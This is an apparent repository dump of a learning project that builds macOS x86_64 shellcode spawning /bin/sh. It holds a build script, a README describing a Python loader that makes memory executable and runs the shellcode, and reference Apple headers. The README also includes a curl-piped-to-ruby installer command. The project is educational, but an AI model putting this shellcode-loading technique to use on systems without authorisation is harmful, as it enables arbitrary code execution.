├── .gitignore
├── LICENSE
├── README.md
├── build.sh
├── docs
    ├── osx-mman.h
    └── osx-syscall.h
├── loader
    ├── contained-py.py
    └── loader.py
└── shellcode
    ├── system-execve-order-file.txt
    └── system-execve-shell.c

/.gitignore:
--------------------------------------------------------------------------------
# Object files
*.o
*.ko
*.obj
*.elf
*.DS_Store
*.sc
# Precompiled Headers
*.gch
*.pch

# Libraries
*.lib
*.a
*.la
*.lo

# Shared objects (inc. Windows DLLs)
*.dll
*.so
*.so.*
*.dylib

# Executables
*.exe
*.out
*.app
*.i*86
*.x86_64
*.hex

# Debug files
*.dSYM/
*.su

--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2017, Alexander Rymdeko-Harvey
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of the copyright holder nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Using C to build OSX Shellcode

A small setup that I used to learn X86_x64 shellcode generation using ASM and compiled C code.


## OSX Host Setup

Please ensure you have the following installed before starting to build.

- Install XCode: `xcode-select --install`
- Install Brew: `/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"`
- Install Brew GCC: `brew install gcc`
- Link GCC 6: `ln -s /usr/local/Cellar/gcc/6.3.0_1/bin/gcc-6 gcc-6`


## Shellcode generation

In this project we have a few different types of shellcode that I have built as POC using C and ASM.

### System Execve /bin/sh
This code uses inline ASM in C for the system call and executes /bin/sh as an example.

## Shellcode loader

In the /loader folder you will find 2 loader examples, the Python and C based loaders. It is a basic shellcode loader, and the best part is that it's pure Python using ctypes and the standard C library.

### Python Example:
`python loader.py ../shellcode/system-execve-shell.sc`

```
MacBook-Pro:loader test$ python loader.py ../shellcode/system-execve-shell.sc
-------------------------------------------
* C runtime libary loaded: /usr/lib/libSystem.B.dylib
* Current page size: 4096
* Shellcode buffer pointer: <__main__.LP_c_int object at 0x10f56b950>
* Shellcode file size: 122
* Shellcode file pointer: <__main__.LP_c_int object at 0x10f56b950>
-------------------------------------------
- Shellcode buffer now RX memory
- Casting pointer to: <__main__.LP_c_int object at 0x10f56b950>
- Executing shellcode
bash-3.2$ exit
exit
```

#### Credit
Thanks for the great resource: https://github.com/tbarabosch/MacRE

--------------------------------------------------------------------------------
/build.sh:
--------------------------------------------------------------------------------
#!/bin/bash
echo "- Starting to build Shellcode: system-execve-shell "
gcc-6 -c shellcode/system-execve-shell.c -o shellcode/system-execve-shell.o --shared -fpic -static -O0 -fno-asynchronous-unwind-tables -D LIB
echo "- Starting to link Shellcode: system-execve-shell "
ld shellcode/system-execve-shell.o -o shellcode/system-execve-shell -S -static -dylib -order_file shellcode/system-execve-order-file.txt
echo "- Starting to export Shellcode: system-execve-shell "
gobjcopy -O binary --only-section=.text shellcode/system-execve-shell shellcode/system-execve-shell.sc

echo "- Clean Up from build"
rm -f shellcode/system-execve-shell.o
rm -f shellcode/system-execve-shell

--------------------------------------------------------------------------------
/docs/osx-mman.h:
--------------------------------------------------------------------------------
/*
 * Copyright (c) 2000-2002 Apple Computer, Inc. All rights reserved.
 *
 * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
 *
 * This file contains Original Code and/or Modifications of Original Code
 * as defined in and that are subject to the Apple Public Source License
 * Version 2.0 (the 'License'). You may not use this file except in
 * compliance with the License. The rights granted to you under the License
 * may not be used to create, or enable the creation or redistribution of,
 * unlawful or unlicensed copies of an Apple operating system, or to
 * circumvent, violate, or enable the circumvention or violation of, any
 * terms of an Apple operating system software license agreement.
 *
 * Please obtain a copy of the License at
 * http://www.opensource.apple.com/apsl/ and read it before using this file.
 *
 * The Original Code and all software distributed under the License are
 * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
 * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
 * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
 * Please see the License for the specific language governing rights and
 * limitations under the License.
 *
 * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
 */
/* Copyright (c) 1995 NeXT Computer, Inc. All Rights Reserved */
/*-
 * Copyright (c) 1982, 1986, 1993
 *	The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 *	@(#)mman.h 8.1 (Berkeley) 6/2/93
 */

/*
 * Currently unsupported:
 *
 * [TYM] POSIX_TYPED_MEM_ALLOCATE
 * [TYM] POSIX_TYPED_MEM_ALLOCATE_CONTIG
 * [TYM] POSIX_TYPED_MEM_MAP_ALLOCATABLE
 * [TYM] struct posix_typed_mem_info
 * [TYM] posix_mem_offset()
 * [TYM] posix_typed_mem_get_info()
 * [TYM] posix_typed_mem_open()
 */

#ifndef _SYS_MMAN_H_
#define _SYS_MMAN_H_

#include
#include

#include

/*
 * [various] The mode_t, off_t, and size_t types shall be defined as
 * described in
 */
#include
#include
#include

/*
 * Protections are chosen from these bits, or-ed together
 */
#define PROT_NONE 0x00 /* [MC2] no permissions */
#define PROT_READ 0x01 /* [MC2] pages can be read */
#define PROT_WRITE 0x02 /* [MC2] pages can be written */
#define PROT_EXEC 0x04 /* [MC2] pages can be executed */

/*
 * Flags contain sharing type and options.
 * Sharing types; choose one.
 */
#define MAP_SHARED 0x0001 /* [MF|SHM] share changes */
#define MAP_PRIVATE 0x0002 /* [MF|SHM] changes are private */
#if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE)
#define MAP_COPY MAP_PRIVATE /* Obsolete */
#endif /* (!_POSIX_C_SOURCE || _DARWIN_C_SOURCE) */

/*
 * Other flags
 */
#define MAP_FIXED 0x0010 /* [MF|SHM] interpret addr exactly */
#if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE)
#define MAP_RENAME 0x0020 /* Sun: rename private pages to file */
#define MAP_NORESERVE 0x0040 /* Sun: don't reserve needed swap area */
#define MAP_RESERVED0080 0x0080 /* previously unimplemented MAP_INHERIT */
#define MAP_NOEXTEND 0x0100 /* for MAP_FILE, don't change file size */
#define MAP_HASSEMAPHORE 0x0200 /* region may contain semaphores */
#define MAP_NOCACHE 0x0400 /* don't cache pages for this mapping */
#define MAP_JIT 0x0800 /* Allocate a region that will be used for JIT purposes */

/*
 * Mapping type
 */
#define MAP_FILE 0x0000 /* map from file (default) */
#define MAP_ANON 0x1000 /* allocated from memory, swap space */
#define MAP_ANONYMOUS MAP_ANON

/*
 * The MAP_RESILIENT_* flags can be used when the caller wants to map some
 * possibly unreliable memory and be able to access it safely, possibly
 * getting the wrong contents rather than raising any exception.
 * For safety reasons, such mappings have to be read-only (PROT_READ access
 * only).
 *
 * MAP_RESILIENT_CODESIGN:
 *	accessing this mapping will not generate code-signing violations,
 *	even if the contents are tainted.
 * MAP_RESILIENT_MEDIA:
 *	accessing this mapping will not generate an exception if the contents
 *	are not available (unreachable removable or remote media, access beyond
 *	end-of-file, ...). Missing contents will be replaced with zeroes.
 */
#define MAP_RESILIENT_CODESIGN 0x2000 /* no code-signing failures */
#define MAP_RESILIENT_MEDIA 0x4000 /* no backing-store failures */

#endif /* (!_POSIX_C_SOURCE || _DARWIN_C_SOURCE) */

/*
 * Process memory locking
 */
#define MCL_CURRENT 0x0001 /* [ML] Lock only current memory */
#define MCL_FUTURE 0x0002 /* [ML] Lock all future memory as well */

/*
 * Error return from mmap()
 */
#define MAP_FAILED ((void *)-1) /* [MF|SHM] mmap failed */

/*
 * msync() flags
 */
#define MS_ASYNC 0x0001 /* [MF|SIO] return immediately */
#define MS_INVALIDATE 0x0002 /* [MF|SIO] invalidate all cached data */
#define MS_SYNC 0x0010 /* [MF|SIO] msync synchronously */

#if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE)
#define MS_KILLPAGES 0x0004 /* invalidate pages, leave mapped */
#define MS_DEACTIVATE 0x0008 /* deactivate pages, leave mapped */

#endif /* (!_POSIX_C_SOURCE || _DARWIN_C_SOURCE) */


/*
 * Advice to madvise
 */
#define POSIX_MADV_NORMAL 0 /* [MC1] no further special treatment */
#define POSIX_MADV_RANDOM 1 /* [MC1] expect random page refs */
#define POSIX_MADV_SEQUENTIAL 2 /* [MC1] expect sequential page refs */
#define POSIX_MADV_WILLNEED 3 /* [MC1] will need these pages */
#define POSIX_MADV_DONTNEED 4 /* [MC1] dont need these pages */

#if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE)
#define MADV_NORMAL POSIX_MADV_NORMAL
#define MADV_RANDOM POSIX_MADV_RANDOM
#define MADV_SEQUENTIAL POSIX_MADV_SEQUENTIAL
#define MADV_WILLNEED POSIX_MADV_WILLNEED
#define MADV_DONTNEED POSIX_MADV_DONTNEED
#define MADV_FREE 5 /* pages unneeded, discard contents */
#define MADV_ZERO_WIRED_PAGES 6 /* zero the wired pages that have not been unwired before the entry is deleted */
#define MADV_FREE_REUSABLE 7 /* pages can be reused (by anyone) */
#define MADV_FREE_REUSE 8 /* caller wants to reuse those pages */
#define MADV_CAN_REUSE 9
#define MADV_PAGEOUT 10 /* page out now (internal only) */

/*
 * Return bits from mincore
 */
#define MINCORE_INCORE 0x1 /* Page is incore */
#define MINCORE_REFERENCED 0x2 /* Page has been referenced by us */
#define MINCORE_MODIFIED 0x4 /* Page has been modified by us */
#define MINCORE_REFERENCED_OTHER 0x8 /* Page has been referenced */
#define MINCORE_MODIFIED_OTHER 0x10 /* Page has been modified */
#endif /* (!_POSIX_C_SOURCE || _DARWIN_C_SOURCE) */



__BEGIN_DECLS
/* [ML] */
int mlockall(int);
int munlockall(void);
/* [MR] */
int mlock(const void *, size_t);
#ifndef _MMAP
#define _MMAP
/* [MC3]*/
void * mmap(void *, size_t, int, int, int, off_t) __DARWIN_ALIAS(mmap);
#endif
/* [MPR] */
int mprotect(void *, size_t, int) __DARWIN_ALIAS(mprotect);
/* [MF|SIO] */
int msync(void *, size_t, int) __DARWIN_ALIAS_C(msync);
/* [MR] */
int munlock(const void *, size_t);
/* [MC3]*/
int munmap(void *, size_t) __DARWIN_ALIAS(munmap);
/* [SHM] */
int shm_open(const char *, int, ...);
int shm_unlink(const char *);
/* [ADV] */
int posix_madvise(void *, size_t, int);

#if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE)
int madvise(void *, size_t, int);
int mincore(const void *, size_t, char *);
int minherit(void *, size_t, int);
#endif


__END_DECLS

#endif /* !_SYS_MMAN_H_ */
--------------------------------------------------------------------------------
/docs/osx-syscall.h:
--------------------------------------------------------------------------------
; derived from: FreeBSD @(#)syscalls.master 8.2 (Berkeley) 1/13/94
; 3 | ; System call name/number master file. 4 | ; This is file processed by .../xnu/bsd/kern/makesyscalls.sh and creates: 5 | ; .../xnu/bsd/kern/init_sysent.c 6 | ; .../xnu/bsd/kern/syscalls.c 7 | ; .../xnu/bsd/sys/syscall.h 8 | ; .../xnu/bsd/sys/sysproto.h 9 | ; .../xnu/bsd/security/audit_syscalls.c 10 | 11 | ; Columns -> | Number Audit Files | { Name and Args } | { Comments } 12 | ; Number: system call number, must be in order 13 | ; Audit: the audit event associated with the system call 14 | ; A value of AUE_NULL means no auditing, but it also means that 15 | ; there is no audit event for the call at this time. For the 16 | ; case where the event exists, but we don't want auditing, the 17 | ; event should be #defined to AUE_NULL in audit_kevents.h. 18 | ; Files: with files to generate - "ALL" or any combo of: 19 | ; "T" for syscall table (in init_sysent.c) 20 | ; "N" for syscall names (in syscalls.c) 21 | ; "H" for syscall headers (in syscall.h) 22 | ; "P" for syscall prototypes (in sysproto.h) 23 | ; Name and Args: function prototype, optionally followed by 24 | ; NO_SYSCALL_STUB (which mean no system call stub will 25 | ; be generated in libSystem) and ending with a semicolon. 26 | ; (Note: functions prefixed by double-underbar are 27 | ; automatically given the NO_SYSCALL_STUB attribute.) 28 | ; Comments: additional comments about the sys call copied to output files 29 | 30 | ; #ifdef's, #include's, #if's etc. are copied to all output files. 31 | ; N.B.: makesyscalls.sh and createsyscalls.pl must be updated to account 32 | ; for any new argument types. 
33 | 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | 41 | 0 AUE_NULL ALL { int nosys(void); } { indirect syscall } 42 | 1 AUE_EXIT ALL { void exit(int rval); } 43 | 2 AUE_FORK ALL { int fork(void); } 44 | 3 AUE_NULL ALL { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); } 45 | 4 AUE_NULL ALL { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); } 46 | 5 AUE_OPEN_RWTC ALL { int open(user_addr_t path, int flags, int mode); } 47 | 6 AUE_CLOSE ALL { int close(int fd); } 48 | 7 AUE_WAIT4 ALL { int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); } 49 | 8 AUE_NULL ALL { int nosys(void); } { old creat } 50 | 9 AUE_LINK ALL { int link(user_addr_t path, user_addr_t link); } 51 | 10 AUE_UNLINK ALL { int unlink(user_addr_t path); } 52 | 11 AUE_NULL ALL { int nosys(void); } { old execv } 53 | 12 AUE_CHDIR ALL { int chdir(user_addr_t path); } 54 | 13 AUE_FCHDIR ALL { int fchdir(int fd); } 55 | 14 AUE_MKNOD ALL { int mknod(user_addr_t path, int mode, int dev); } 56 | 15 AUE_CHMOD ALL { int chmod(user_addr_t path, int mode); } 57 | 16 AUE_CHOWN ALL { int chown(user_addr_t path, int uid, int gid); } 58 | 17 AUE_NULL ALL { int nosys(void); } { old break } 59 | 18 AUE_GETFSSTAT ALL { int getfsstat(user_addr_t buf, int bufsize, int flags); } 60 | 19 AUE_NULL ALL { int nosys(void); } { old lseek } 61 | 20 AUE_GETPID ALL { int getpid(void); } 62 | 21 AUE_NULL ALL { int nosys(void); } { old mount } 63 | 22 AUE_NULL ALL { int nosys(void); } { old umount } 64 | 23 AUE_SETUID ALL { int setuid(uid_t uid); } 65 | 24 AUE_GETUID ALL { int getuid(void); } 66 | 25 AUE_GETEUID ALL { int geteuid(void); } 67 | 26 AUE_PTRACE ALL { int ptrace(int req, pid_t pid, caddr_t addr, int data); } 68 | #if SOCKETS 69 | 27 AUE_RECVMSG ALL { int recvmsg(int s, struct msghdr *msg, int flags); } 70 | 28 AUE_SENDMSG ALL { int sendmsg(int s, caddr_t msg, int flags); } 71 | 29 AUE_RECVFROM ALL { int recvfrom(int s, void *buf, 
size_t len, int flags, struct sockaddr *from, int *fromlenaddr); } 72 | 30 AUE_ACCEPT ALL { int accept(int s, caddr_t name, socklen_t *anamelen); } 73 | 31 AUE_GETPEERNAME ALL { int getpeername(int fdes, caddr_t asa, socklen_t *alen); } 74 | 32 AUE_GETSOCKNAME ALL { int getsockname(int fdes, caddr_t asa, socklen_t *alen); } 75 | #else 76 | 27 AUE_NULL ALL { int nosys(void); } 77 | 28 AUE_NULL ALL { int nosys(void); } 78 | 29 AUE_NULL ALL { int nosys(void); } 79 | 30 AUE_NULL ALL { int nosys(void); } 80 | 31 AUE_NULL ALL { int nosys(void); } 81 | 32 AUE_NULL ALL { int nosys(void); } 82 | #endif /* SOCKETS */ 83 | 33 AUE_ACCESS ALL { int access(user_addr_t path, int flags); } 84 | 34 AUE_CHFLAGS ALL { int chflags(char *path, int flags); } 85 | 35 AUE_FCHFLAGS ALL { int fchflags(int fd, int flags); } 86 | 36 AUE_SYNC ALL { int sync(void); } 87 | 37 AUE_KILL ALL { int kill(int pid, int signum, int posix); } 88 | 38 AUE_NULL ALL { int nosys(void); } { old stat } 89 | 39 AUE_GETPPID ALL { int getppid(void); } 90 | 40 AUE_NULL ALL { int nosys(void); } { old lstat } 91 | 41 AUE_DUP ALL { int dup(u_int fd); } 92 | 42 AUE_PIPE ALL { int pipe(void); } 93 | 43 AUE_GETEGID ALL { int getegid(void); } 94 | 44 AUE_PROFILE ALL { int profil(short *bufbase, size_t bufsize, u_long pcoffset, u_int pcscale); } 95 | 45 AUE_NULL ALL { int nosys(void); } { old ktrace } 96 | 46 AUE_SIGACTION ALL { int sigaction(int signum, struct __sigaction *nsa, struct sigaction *osa); } 97 | 47 AUE_GETGID ALL { int getgid(void); } 98 | 48 AUE_SIGPROCMASK ALL { int sigprocmask(int how, user_addr_t mask, user_addr_t omask); } 99 | 49 AUE_GETLOGIN ALL { int getlogin(char *namebuf, u_int namelen); } 100 | 50 AUE_SETLOGIN ALL { int setlogin(char *namebuf); } 101 | 51 AUE_ACCT ALL { int acct(char *path); } 102 | 52 AUE_SIGPENDING ALL { int sigpending(struct sigvec *osv); } 103 | 53 AUE_SIGALTSTACK ALL { int sigaltstack(struct sigaltstack *nss, struct sigaltstack *oss); } 104 | 54 AUE_IOCTL ALL { int ioctl(int 
fd, u_long com, caddr_t data); } 105 | 55 AUE_REBOOT ALL { int reboot(int opt, char *command); } 106 | 56 AUE_REVOKE ALL { int revoke(char *path); } 107 | 57 AUE_SYMLINK ALL { int symlink(char *path, char *link); } 108 | 58 AUE_READLINK ALL { int readlink(char *path, char *buf, int count); } 109 | 59 AUE_EXECVE ALL { int execve(char *fname, char **argp, char **envp); } 110 | 60 AUE_UMASK ALL { int umask(int newmask); } 111 | 61 AUE_CHROOT ALL { int chroot(user_addr_t path); } 112 | 62 AUE_NULL ALL { int nosys(void); } { old fstat } 113 | 63 AUE_NULL ALL { int nosys(void); } { used internally, reserved } 114 | 64 AUE_NULL ALL { int nosys(void); } { old getpagesize } 115 | 65 AUE_MSYNC ALL { int msync(caddr_t addr, size_t len, int flags); } 116 | 66 AUE_VFORK ALL { int vfork(void); } 117 | 67 AUE_NULL ALL { int nosys(void); } { old vread } 118 | 68 AUE_NULL ALL { int nosys(void); } { old vwrite } 119 | 69 AUE_NULL ALL { int nosys(void); } { old sbrk } 120 | 70 AUE_NULL ALL { int nosys(void); } { old sstk } 121 | 71 AUE_NULL ALL { int nosys(void); } { old mmap } 122 | 72 AUE_NULL ALL { int nosys(void); } { old vadvise } 123 | 73 AUE_MUNMAP ALL { int munmap(caddr_t addr, size_t len); } 124 | 74 AUE_MPROTECT ALL { int mprotect(caddr_t addr, size_t len, int prot); } 125 | 75 AUE_MADVISE ALL { int madvise(caddr_t addr, size_t len, int behav); } 126 | 76 AUE_NULL ALL { int nosys(void); } { old vhangup } 127 | 77 AUE_NULL ALL { int nosys(void); } { old vlimit } 128 | 78 AUE_MINCORE ALL { int mincore(user_addr_t addr, user_size_t len, user_addr_t vec); } 129 | 79 AUE_GETGROUPS ALL { int getgroups(u_int gidsetsize, gid_t *gidset); } 130 | 80 AUE_SETGROUPS ALL { int setgroups(u_int gidsetsize, gid_t *gidset); } 131 | 81 AUE_GETPGRP ALL { int getpgrp(void); } 132 | 82 AUE_SETPGRP ALL { int setpgid(int pid, int pgid); } 133 | 83 AUE_SETITIMER ALL { int setitimer(u_int which, struct itimerval *itv, struct itimerval *oitv); } 134 | 84 AUE_NULL ALL { int nosys(void); } { old wait } 
135 | 85 AUE_SWAPON ALL { int swapon(void); } 136 | 86 AUE_GETITIMER ALL { int getitimer(u_int which, struct itimerval *itv); } 137 | 87 AUE_NULL ALL { int nosys(void); } { old gethostname } 138 | 88 AUE_NULL ALL { int nosys(void); } { old sethostname } 139 | 89 AUE_GETDTABLESIZE ALL { int getdtablesize(void); } 140 | 90 AUE_DUP2 ALL { int dup2(u_int from, u_int to); } 141 | 91 AUE_NULL ALL { int nosys(void); } { old getdopt } 142 | 92 AUE_FCNTL ALL { int fcntl(int fd, int cmd, long arg); } 143 | 93 AUE_SELECT ALL { int select(int nd, u_int32_t *in, u_int32_t *ou, u_int32_t *ex, struct timeval *tv); } 144 | 94 AUE_NULL ALL { int nosys(void); } { old setdopt } 145 | 95 AUE_FSYNC ALL { int fsync(int fd); } 146 | 96 AUE_SETPRIORITY ALL { int setpriority(int which, id_t who, int prio); } 147 | #if SOCKETS 148 | 97 AUE_SOCKET ALL { int socket(int domain, int type, int protocol); } 149 | 98 AUE_CONNECT ALL { int connect(int s, caddr_t name, socklen_t namelen); } 150 | #else 151 | 97 AUE_NULL ALL { int nosys(void); } 152 | 98 AUE_NULL ALL { int nosys(void); } 153 | #endif /* SOCKETS */ 154 | 99 AUE_NULL ALL { int nosys(void); } { old accept } 155 | 100 AUE_GETPRIORITY ALL { int getpriority(int which, id_t who); } 156 | 101 AUE_NULL ALL { int nosys(void); } { old send } 157 | 102 AUE_NULL ALL { int nosys(void); } { old recv } 158 | 103 AUE_NULL ALL { int nosys(void); } { old sigreturn } 159 | #if SOCKETS 160 | 104 AUE_BIND ALL { int bind(int s, caddr_t name, socklen_t namelen); } 161 | 105 AUE_SETSOCKOPT ALL { int setsockopt(int s, int level, int name, caddr_t val, socklen_t valsize); } 162 | 106 AUE_LISTEN ALL { int listen(int s, int backlog); } 163 | #else 164 | 104 AUE_NULL ALL { int nosys(void); } 165 | 105 AUE_NULL ALL { int nosys(void); } 166 | 106 AUE_NULL ALL { int nosys(void); } 167 | #endif /* SOCKETS */ 168 | 107 AUE_NULL ALL { int nosys(void); } { old vtimes } 169 | 108 AUE_NULL ALL { int nosys(void); } { old sigvec } 170 | 109 AUE_NULL ALL { int nosys(void); } 
{ old sigblock } 171 | 110 AUE_NULL ALL { int nosys(void); } { old sigsetmask } 172 | 111 AUE_NULL ALL { int sigsuspend(sigset_t mask); } 173 | 112 AUE_NULL ALL { int nosys(void); } { old sigstack } 174 | #if SOCKETS 175 | 113 AUE_NULL ALL { int nosys(void); } { old recvmsg } 176 | 114 AUE_NULL ALL { int nosys(void); } { old sendmsg } 177 | #else 178 | 113 AUE_NULL ALL { int nosys(void); } 179 | 114 AUE_NULL ALL { int nosys(void); } 180 | #endif /* SOCKETS */ 181 | 115 AUE_NULL ALL { int nosys(void); } { old vtrace } 182 | 116 AUE_GETTIMEOFDAY ALL { int gettimeofday(struct timeval *tp, struct timezone *tzp); } 183 | 117 AUE_GETRUSAGE ALL { int getrusage(int who, struct rusage *rusage); } 184 | #if SOCKETS 185 | 118 AUE_GETSOCKOPT ALL { int getsockopt(int s, int level, int name, caddr_t val, socklen_t *avalsize); } 186 | #else 187 | 118 AUE_NULL ALL { int nosys(void); } 188 | #endif /* SOCKETS */ 189 | 119 AUE_NULL ALL { int nosys(void); } { old resuba } 190 | 120 AUE_READV ALL { user_ssize_t readv(int fd, struct iovec *iovp, u_int iovcnt); } 191 | 121 AUE_WRITEV ALL { user_ssize_t writev(int fd, struct iovec *iovp, u_int iovcnt); } 192 | 122 AUE_SETTIMEOFDAY ALL { int settimeofday(struct timeval *tv, struct timezone *tzp); } 193 | 123 AUE_FCHOWN ALL { int fchown(int fd, int uid, int gid); } 194 | 124 AUE_FCHMOD ALL { int fchmod(int fd, int mode); } 195 | 125 AUE_NULL ALL { int nosys(void); } { old recvfrom } 196 | 126 AUE_SETREUID ALL { int setreuid(uid_t ruid, uid_t euid); } 197 | 127 AUE_SETREGID ALL { int setregid(gid_t rgid, gid_t egid); } 198 | 128 AUE_RENAME ALL { int rename(char *from, char *to); } 199 | 129 AUE_NULL ALL { int nosys(void); } { old truncate } 200 | 130 AUE_NULL ALL { int nosys(void); } { old ftruncate } 201 | 131 AUE_FLOCK ALL { int flock(int fd, int how); } 202 | 132 AUE_MKFIFO ALL { int mkfifo(user_addr_t path, int mode); } 203 | #if SOCKETS 204 | 133 AUE_SENDTO ALL { int sendto(int s, caddr_t buf, size_t len, int flags, caddr_t to, 
socklen_t tolen); } 205 | 134 AUE_SHUTDOWN ALL { int shutdown(int s, int how); } 206 | 135 AUE_SOCKETPAIR ALL { int socketpair(int domain, int type, int protocol, int *rsv); } 207 | #else 208 | 133 AUE_NULL ALL { int nosys(void); } 209 | 134 AUE_NULL ALL { int nosys(void); } 210 | 135 AUE_NULL ALL { int nosys(void); } 211 | #endif /* SOCKETS */ 212 | 136 AUE_MKDIR ALL { int mkdir(user_addr_t path, int mode); } 213 | 137 AUE_RMDIR ALL { int rmdir(char *path); } 214 | 138 AUE_UTIMES ALL { int utimes(char *path, struct timeval *tptr); } 215 | 139 AUE_FUTIMES ALL { int futimes(int fd, struct timeval *tptr); } 216 | 140 AUE_ADJTIME ALL { int adjtime(struct timeval *delta, struct timeval *olddelta); } 217 | 141 AUE_NULL ALL { int nosys(void); } { old getpeername } 218 | 142 AUE_SYSCTL ALL { int gethostuuid(unsigned char *uuid_buf, const struct timespec *timeoutp); } 219 | 143 AUE_NULL ALL { int nosys(void); } { old sethostid } 220 | 144 AUE_NULL ALL { int nosys(void); } { old getrlimit } 221 | 145 AUE_NULL ALL { int nosys(void); } { old setrlimit } 222 | 146 AUE_NULL ALL { int nosys(void); } { old killpg } 223 | 147 AUE_SETSID ALL { int setsid(void); } 224 | 148 AUE_NULL ALL { int nosys(void); } { old setquota } 225 | 149 AUE_NULL ALL { int nosys(void); } { old qquota } 226 | 150 AUE_NULL ALL { int nosys(void); } { old getsockname } 227 | 151 AUE_GETPGID ALL { int getpgid(pid_t pid); } 228 | 152 AUE_SETPRIVEXEC ALL { int setprivexec(int flag); } 229 | 153 AUE_PREAD ALL { user_ssize_t pread(int fd, user_addr_t buf, user_size_t nbyte, off_t offset); } 230 | 154 AUE_PWRITE ALL { user_ssize_t pwrite(int fd, user_addr_t buf, user_size_t nbyte, off_t offset); } 231 | 232 | #if NFSSERVER 233 | 155 AUE_NFS_SVC ALL { int nfssvc(int flag, caddr_t argp); } 234 | #else 235 | 155 AUE_NULL ALL { int nosys(void); } 236 | #endif 237 | 238 | 156 AUE_NULL ALL { int nosys(void); } { old getdirentries } 239 | 157 AUE_STATFS ALL { int statfs(char *path, struct statfs *buf); } 240 | 158 
AUE_FSTATFS ALL { int fstatfs(int fd, struct statfs *buf); }
159 AUE_UNMOUNT ALL { int unmount(user_addr_t path, int flags); }
160 AUE_NULL ALL { int nosys(void); } { old async_daemon }

#if NFSSERVER
161 AUE_NFS_GETFH ALL { int getfh(char *fname, fhandle_t *fhp); }
#else
161 AUE_NULL ALL { int nosys(void); }
#endif

162 AUE_NULL ALL { int nosys(void); } { old getdomainname }
163 AUE_NULL ALL { int nosys(void); } { old setdomainname }
164 AUE_NULL ALL { int nosys(void); }
165 AUE_QUOTACTL ALL { int quotactl(const char *path, int cmd, int uid, caddr_t arg); }
166 AUE_NULL ALL { int nosys(void); } { old exportfs }
167 AUE_MOUNT ALL { int mount(char *type, char *path, int flags, caddr_t data); }
168 AUE_NULL ALL { int nosys(void); } { old ustat }
169 AUE_CSOPS ALL { int csops(pid_t pid, uint32_t ops, user_addr_t useraddr, user_size_t usersize); }
170 AUE_NULL HN { int nosys(void); } { old table }
171 AUE_NULL ALL { int nosys(void); } { old wait3 }
172 AUE_NULL ALL { int nosys(void); } { old rpause }
